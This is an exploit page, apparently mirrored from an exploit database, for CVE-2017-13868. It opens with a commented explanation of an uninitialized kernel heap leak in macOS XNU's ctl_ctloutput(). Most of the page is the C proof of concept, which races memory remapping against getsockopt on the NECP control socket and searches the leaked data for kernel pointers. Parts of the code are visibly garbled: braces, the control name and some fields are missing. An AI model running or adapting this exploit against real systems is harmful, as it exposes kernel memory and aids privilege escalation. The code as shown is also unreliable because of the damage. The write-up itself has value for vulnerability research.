Apple macOS High Sierra 10.13 – ‘ctl_ctloutput-leak’ Information Leak

  • 作者: Brandon Azad
    日期: 2017-12-07
  • 类别:
  • 来源:
  • /*
     * ctl_ctloutput-leak.c
     * Brandon Azad
     * CVE-2017-13868
     * While looking through the source code of XNU version 4570.1.46, I noticed that the function
     * ctl_ctloutput() in the file bsd/kern/kern_control.c does not check the return value of
     * sooptcopyin(), which makes it possible to leak the uninitialized contents of a kernel heap
     * allocation to user space. Triggering this information leak requires root privileges.
     * The ctl_ctloutput() function is called when a userspace program calls getsockopt(2) on a kernel
     * control socket. The relevant code does the following:
     * (a) It allocates a kernel heap buffer for the data parameter to getsockopt(), without
     * specifying the M_ZERO flag to zero out the allocated bytes.
     * (b) It copies in the getsockopt() data from userspace using sooptcopyin(), filling the data
     * buffer just allocated. This copyin is supposed to completely overwrite the allocated data,
     * which is why the M_ZERO flag was not needed. However, the return value of sooptcopyin() is
     * not checked, which means it is possible that the copyin has failed, leaving uninitialized
     * data in the buffer. The copyin could fail if, for example, the program passed an unmapped
     * address to getsockopt().
     * (c) The code then calls the real getsockopt() implementation for this kernel control socket.
     * This implementation should process the input buffer, possibly modifying it and shortening
     * it, and return a result code. However, the implementation is free to assume that the
     * supplied buffer has already been initialized (since theoretically it comes from user
     * space), and hence several implementations don't modify the buffer at all. The NECP
     * function necp_ctl_getopt(), for example, just returns 0 without processing the data buffer
     * at all.
     * (d) Finally, if the real getsockopt() implementation doesn't return an error, ctl_ctloutput()
     * calls sooptcopyout() to copy the data buffer back to user space.
     * Thus, by specifying an unmapped data address to getsockopt(2), we can cause a heap buffer of a
     * controlled size to be allocated, prevent the contents of that buffer from being initialized, and
     * then reach a call to sooptcopyout() that tries to write that buffer back to the unmapped
     * address. All we need to do for the copyout to succeed is remap that address between the calls to
     * sooptcopyin() and sooptcopyout(). If we can do that, then we will leak uninitialized kernel heap
     * data to userspace.
     * It turns out that this is a pretty easy race to win. While testing on my 2015 Macbook Pro, the
     * mean number of attempts to win the race was never more than 600, and the median was never more
     * than 5. (This testing was conducted with DEBUG off, since the printfs dramatically slow down the
     * exploit.)
     * This program exploits this vulnerability to leak data from a kernel heap buffer of a
     * user-specified size. No attempt is made to seed the heap with interesting data. Tested on macOS
     * High Sierra 10.13 (build 17A365).
     * Download:
    #if 0
    	if (sopt->sopt_valsize && sopt->sopt_val) {
    		MALLOC(data, void *, sopt->sopt_valsize, M_TEMP,	// (a) data is allocated
    			M_WAITOK);					// without M_ZERO.
    		if (data == NULL)
    			return (ENOMEM);
    		 * 4108337 - copy user data in case the
    		 * kernel control needs it
    		error = sooptcopyin(sopt, data,				// (b) sooptcopyin() is
    			sopt->sopt_valsize, sopt->sopt_valsize);	// called to fill the
    	}								// buffer; the return
    	len = sopt->sopt_valsize;					// value is ignored.
    	socket_unlock(so, 0);
    	error = (*kctl->getopt)(kctl->kctlref, kcb->unit,		// (c) The getsockopt()
    			kcb->userdata, sopt->sopt_name,			// implementation is
    				data, &len);				// called to process
    	if (data != NULL && len > sopt->sopt_valsize)			// the buffer.
    		panic_plain("ctl_ctloutput: ctl %s returned "
    			"len (%lu) > sopt_valsize (%lu)\n",
    				kcb->kctl->name, len,
    	socket_lock(so, 0);
    	if (error == 0) {
    		if (data != NULL)
    			error = sooptcopyout(sopt, data, len);		// (d) If (c) succeeded,
    		else							// then the data buffer
    			sopt->sopt_valsize = len;			// is copied out to
    	}								// userspace.
    #include <errno.h>
    #include <mach/mach.h>
    #include <netinet/in.h>
    #include <pthread.h>
    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/ioctl.h>
    #include <unistd.h>
    #if __x86_64__
    // ---- Header files not available on iOS ---------------------------------------------------------
    #include <mach/mach_vm.h>
    #include <sys/sys_domain.h>
    #include <sys/kern_control.h>
    #else /* __x86_64__ */
    // If we're not on x86_64, then we probably don't have access to the above headers. The following
    // definitions are copied directly from the macOS header files.
    // ---- Definitions from mach/mach_vm.h -----------------------------------------------------------
    kern_return_t mach_vm_allocate
    	vm_map_t target,
    	mach_vm_address_t *address,
    	mach_vm_size_t size,
    	int flags
    kern_return_t mach_vm_deallocate
    	vm_map_t target,
    	mach_vm_address_t address,
    	mach_vm_size_t size
    // ---- Definitions from sys/sys_domain.h ---------------------------------------------------------
    #define SYSPROTO_CONTROL	2	/* kernel control protocol */
    #define AF_SYS_CONTROL		2	/* corresponding sub address type */
    // ---- Definitions from sys/kern_control.h -------------------------------------------------------
    #define CTLIOCGINFO _IOWR('N', 3, struct ctl_info)	/* get id from name */
    #define MAX_KCTL_NAME	96
    struct ctl_info {
    u_int32_t	ctl_id;					/* Kernel Controller ID*/
    char	ctl_name[MAX_KCTL_NAME];		/* Kernel Controller Name (a C string) */
    struct sockaddr_ctl {
    u_char	sc_len;		/* depends on size of bundle ID string */
    u_char	sc_family;	/* AF_SYSTEM */
    u_int16_t 	ss_sysaddr;	/* AF_SYS_KERNCONTROL */
    u_int32_t	sc_id; 		/* Controller unique identifier*/
    u_int32_t 	sc_unit;	/* Developer private unit number */
    u_int32_t 	sc_reserved[5];
    #endif /* __x86_64__ */
    // ---- Definitions from bsd/net/necp.h -----------------------------------------------------------
    #define	NECP_CONTROL_NAME ""
    // ---- Macros ------------------------------------------------------------------------------------
    #if DEBUG
    #define DEBUG_TRACE(fmt, ...)	printf(fmt"\n", ##__VA_ARGS__)
    #define DEBUG_TRACE(fmt, ...)
    #define ERROR(fmt, ...)		printf("Error: "fmt"\n", ##__VA_ARGS__)
    // ---- Kernel heap infoleak ----------------------------------------------------------------------
    // A callback block that will be called each time kernel data is leaked. leak_data and leak_size
    // are the kernel data that was leaked and the size of the leak. This function should return true
    // to finish and clean up, false to retry the leak.
    typedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);
    // Open the control socket for Requires root privileges.
    static bool open_necp_control_socket(int *necp_ctlfd) {
    	int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
    	if (ctlfd < 0) {
    		ERROR("Could not create a system control socket: errno %d", errno);
    		return false;
    	struct ctl_info ctlinfo = { .ctl_id = 0 };
    	strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));
    	int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);
    	if (err) {
    		ERROR("Could not retrieve the control ID number for %s: errno %d",
    				NECP_CONTROL_NAME, errno);
    		return false;
    	struct sockaddr_ctl addr = {
    		.sc_len = sizeof(addr),
    		.sc_family= AF_SYSTEM,
    		.ss_sysaddr = AF_SYS_CONTROL,
    		.sc_id= ctlinfo.ctl_id, //
    		.sc_unit= 0,// Let the kernel pick the control unit.
    	err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));
    	if (err) {
    		ERROR("Could not connect to the NECP control system (ID %d) "
    				"unit %d: errno %d", addr.sc_id, addr.sc_unit, errno);
    		return false;
    	*necp_ctlfd = ctlfd;
    	return true;
    // Allocate a virtual memory region at the address pointed to by map_address. If map_address points
    // to a NULL address, then the allocation is created at an arbitrary address which is stored in
    // map_address on return.
    static bool allocate_map_address(void **map_address, size_t map_size) {
    	mach_vm_address_t address = (mach_vm_address_t) *map_address;
    	bool get_address = (address == 0);
    	int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);
    	kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);
    	if (kr != KERN_SUCCESS) {
    		ERROR("Could not allocate virtual memory: mach_vm_allocate %d: %s",
    				kr, mach_error_string(kr));
    		return false;
    	if (get_address) {
    		*map_address = (void *)address;
    	return true;
    // Deallocate the mapping created by allocate_map_address.
    static void deallocate_map_address(void *map_address, size_t map_size) {
    	mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);
    // Context for the map_address_racer thread.
    struct map_address_racer_context {
    	pthread_t thread;
    	volatile bool running;
    	volatile bool deallocated;
    	volatile bool do_map;
    	volatile bool restart;
    	void *address;
    // The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map
    // is true; (c) allocate the address; (d) spin until the main thread sets restart to true or
    // running to false. If the thread encounters an internal error, it sets success to false and
    // exits.
    static void *map_address_racer(void *arg) {
    	struct map_address_racer_context *context = arg;
    	while (context->running) {
    		// Deallocate the address.
    		deallocate_map_address(context->address, context->size);
    		context->deallocated = true;
    		// Wait for do_map to become true.
    		while (!context->do_map) {}
    		context->do_map = false;
    		// Do a little bit of work so that the allocation is more likely to take place at
    		// the right time.
    		// Re-allocate the address. If this fails, abort.
    		bool success = allocate_map_address(&context->address, context->size);
    		if (!success) {
    			context->success = false;
    		// Wait while we're still running and not told to restart.
    		while (context->running && !context->restart) {}
    		context->restart = false;
    	return NULL;
    // Start the map_address_racer thread.
    static bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {
    	// Allocate the initial block of memory, fixing the address.
    	context->address = NULL;
    	context->size= leak_size;
    	if (!allocate_map_address(&context->address, context->size)) {
    		goto fail_0;
    	// Start the racer thread.
    	context->running = true;
    	context->deallocated = false;
    	context->do_map= false;
    	context->restart = false;
    	context->success = true;
    	int err = pthread_create(&context->thread, NULL, map_address_racer, context);
    	if (err) {
    		ERROR("Could not create map_address_racer thread: errno %d", err);
    		goto fail_1;
    	return true;
    	deallocate_map_address(context->address, context->size);
    	return false;
    // Stop the map_address_racer thread.
    static void stop_map_address_racer(struct map_address_racer_context *context) {
    	// Exit the thread.
    	context->running = false;
    	context->do_map= true;
    	pthread_join(context->thread, NULL);
    	// Deallocate the memory.
    	deallocate_map_address(context->address, context->size);
    // Try the NECP leak once. Returns true if the leak succeeded.
    static bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {
    	socklen_t length = context->size;
    	// Wait for the map to be deallocated.
    	while (!context->deallocated) {};
    	context->deallocated = false;
    	// Signal the racer to do the mapping.
    	context->do_map = true;
    	// Try to trigger the leak.
    	int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);
    	if (err) {
    		DEBUG_TRACE("Did not allocate in time");
    		return false;
    	// Most of the time we end up here: allocating too early. If the first two words are both
    	// 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.
    	uint64_t *data = context->address;
    	if (data[0] == 0 && data[1] == 0) {
    		return false;
    	// WOW! It worked!
    	return true;
    // Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.
    static bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,
    		struct map_address_racer_context *context) {
    	const size_t MAX_TRIES = 10000000;
    	bool has_leaked = false;
    	for (size_t try = 1;; try++) {
    		// Try the leak once.
    		if (try_necp_leak(ctlfd, context)) {
    			DEBUG_TRACE("Triggered the leak after %zu %s!", try,
    					(try == 1 ? "try" : "tries"));
    			try = 0;
    			has_leaked = true;
    			// Give the leak to the callback, and finish if it says we're done.
    			if (kernel_leak_callback(context->address, context->size)) {
    				return true;
    		// If we haven't successfully leaked anything after MAX_TRIES attempts, give up.
    		if (!has_leaked && try >= MAX_TRIES) {
    			ERROR("Giving up after %zu unsuccessful leak attempts", try);
    			return false;
    		// Reset for another try.
    		context->restart = true;
    // Leak kernel heap data repeatedly until the callback function returns true.
    static bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {
    	const size_t MIN_LEAK_SIZE = 16;
    	bool success = false;
    	if (leak_size < MIN_LEAK_SIZE) {
    		ERROR("Target leak size too small; must be at least %zu bytes", MIN_LEAK_SIZE);
    		goto fail_0;
    	int ctlfd;
    	if (!open_necp_control_socket(&ctlfd)) {
    		goto fail_0;
    	struct map_address_racer_context context;
    	if (!start_map_address_racer(&context, leak_size)) {
    		goto fail_1;
    	if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {
    		goto fail_2;
    	success = true;
    	return success;
    // ---- Main --------------------------------------------------------------------------------------
    // Dump data to stdout.
    static void dump(const void *data, size_t size) {
    	const uint8_t *p = data;
    	const uint8_t *end = p + size;
    	unsigned off = 0;
    	while (p < end) {
    		printf("%06x:%02x", off & 0xffffff, *p++);
    		for (unsigned i = 1; i < 16 && p < end; i++) {
    			bool space = (i % 8) == 0;
    			printf(" %s%02x", (space ? " " : ""), *p++);
    		off += 16;
    int main(int argc, const char *argv[]) {
    	// Parse the arguments.
    	if (argc != 2) {
    		ERROR("Usage: %s <leak-size>", argv[0]);
    		return 1;
    	char *end;
    	size_t leak_size = strtoul(argv[1], &end, 0);
    	if (*end != 0) {
    		ERROR("Invalid leak size '%s'", argv[1]);
    		return 1;
    	// Try to leak interesting data from the kernel.
    	const size_t MAX_TRIES = 50000;
    	__block size_t try = 1;
    	__block bool leaked = false;
    	bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {
    		// Try to find an kernel pointer in the leak.
    		const uint64_t *p = leak;
    		for (size_t i = 0; i < size / sizeof(*p); i++) {
    			if (p[i] >> 48 == 0xffff) {
    				dump(leak, size);
    				leaked = true;
    				return true;
    #if DEBUG
    		// Show this useless leak anyway.
    		DEBUG_TRACE("Boring leak:");
    		dump(leak, size);
    		// If we've maxed out, just bail.
    		if (try >= MAX_TRIES) {
    			ERROR("Could not leak interesting data after %zu attempts", try);
    			return true;
    		return false;
    	return (success && leaked ? 0 : 1);